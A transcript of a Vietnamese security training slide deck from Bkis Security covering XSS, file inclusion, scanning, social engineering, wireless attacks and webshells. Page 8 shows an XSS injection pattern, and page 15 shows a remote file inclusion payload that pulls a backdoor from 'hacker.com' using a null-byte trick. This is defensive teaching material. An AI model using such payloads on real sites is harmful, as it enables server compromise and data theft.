security task force trainning

33
Security Task Force Trainning Nguyễn Ngọc Minh Bkis Security

Upload: bkav

Post on 22-Jun-2015

92 views

Category:

Technology


0 download

DESCRIPTION

Security Task Force Trainning Nguyễn Ngọc Minh Bkis Security

TRANSCRIPT

Page 1: Security Task Force Trainning

Security Task Force Trainning

Nguyễn Ngọc MinhBkis Security

Page 2: Security Task Force Trainning

Nội dung bài giới thiệu

Các lỗ hổng XSS & File Inclusion

Tấn công dựa trên thăm dò và tìm kiếm (Footprinting, Scanning)

Tấn công dựa trên điểm yếu con người (Social Engineering)

Tấn công qua mạng không dây (Wireless Hacking)

Case Study: Làm việc với các webshell cơ bản.

Page 3: Security Task Force Trainning

Lỗ hổng XSS

Page 4: Security Task Force Trainning

Xét một ví dụ thực tế

Login Login

???

Cookie1 Cookie2

Session1 Session2

Page 5: Security Task Force Trainning

Mỗi trình duyệt có thể mở nhiều website

Page 6: Security Task Force Trainning

Cơ chế Cross –Domain giúp cho “website” này không lấy được thông tin của “website” kia

Page 7: Security Task Force Trainning

http://bkav.com/timkiem.asp?tukhoa=hello

<br><div class="agent_name">Kết quả tìm kiếm<br><br>Không tìm thấy từ hello<br><br></div>

MỌI THÔNG TIN INPUT ĐỀU ĐƯỢC OUTPUT RA TRÌNH DUYỆT!!!

Page 8: Security Task Force Trainning

http://bkav.com/timkiem.asp?tukhoa= hello<br><br></div> [Một đoạn mã html - Javascript] <div>

Một đoãn Mã JavaScript sẽ được thực thi!!!

<br><div class="agent_name">Kết quả tìm kiếm<br><br>Không tìm thấy từ hello<br><br></div> [Một đoạn mã html- Javascript] <div> <br><br></div>

Page 9: Security Task Force Trainning

http://bkav.com/timkiem.asp?tukhoa= hello<br><br></div> [Một đoạn mã html - Javascript] <div>

Một đoãn Mã JavaScript sẽ được thực thi!!!

<br><div class="agent_name">Kết quả tìm kiếm<br><br>Không tìm thấy từ hello<br><br></div> [Một đoạn mã html- Javascript] <div> <br><br></div>

Page 10: Security Task Force Trainning

Kịch bản tấn công XSS

Page 11: Security Task Force Trainning

DEMO: Khai thác lỗ hổng XSS

Page 12: Security Task Force Trainning

Lỗ hổng File Inclusion

Page 13: Security Task Force Trainning

Cơ chế Include

……..Include(‘a.txt’)………

a.Txt………..……..….......……..

……..…….........………….…….........………….………

Page 14: Security Task Force Trainning

Vì sao cần phải có cơ chế include

Tối giản mã

Phát triển module

……..

Page 15: Security Task Force Trainning

nokia/product_info.phpsony/product_info.php

include(“$sanpham/product.info”);http://hacker.com/backdoor.txt%00

include(“http://hacker.com/backdoor.txt%00/product.info”);

include(“http://hacker.com/backdoor.txt”);

Page 16: Security Task Force Trainning

DEMO: Khai thác lỗ hổng File Inclusion

Page 17: Security Task Force Trainning

Tấn công qua các lỗ hổng đã biết

Page 18: Security Task Force Trainning

* Bản vá

* Mã khai thác được công bố

* Target

Page 19: Security Task Force Trainning

DEMO: Tấn công khai tháchttp://www.faultlyne.com

Page 20: Security Task Force Trainning

Foot Printing & Scanning

Page 21: Security Task Force Trainning

Foot Printing & Scanning???

Page 22: Security Task Force Trainning

DEMO: Lấy thông tin của www.bkav.com.vn

Page 23: Security Task Force Trainning

NMAP

Page 24: Security Task Force Trainning

Google Hacking

Page 25: Security Task Force Trainning
Page 26: Security Task Force Trainning
Page 27: Security Task Force Trainning
Page 28: Security Task Force Trainning

Social Engineering

Page 29: Security Task Force Trainning

• Gọi điện thoại

•Email

• Nhân viên dịch vụ…

Page 30: Security Task Force Trainning

Wireless Hacking

Page 31: Security Task Force Trainning

Mã hóa

Chứng thực

WEP

WPA

WPA2

Page 32: Security Task Force Trainning

Case Study:Thực hành với các webshell

Page 33: Security Task Force Trainning

Xin cảm ơn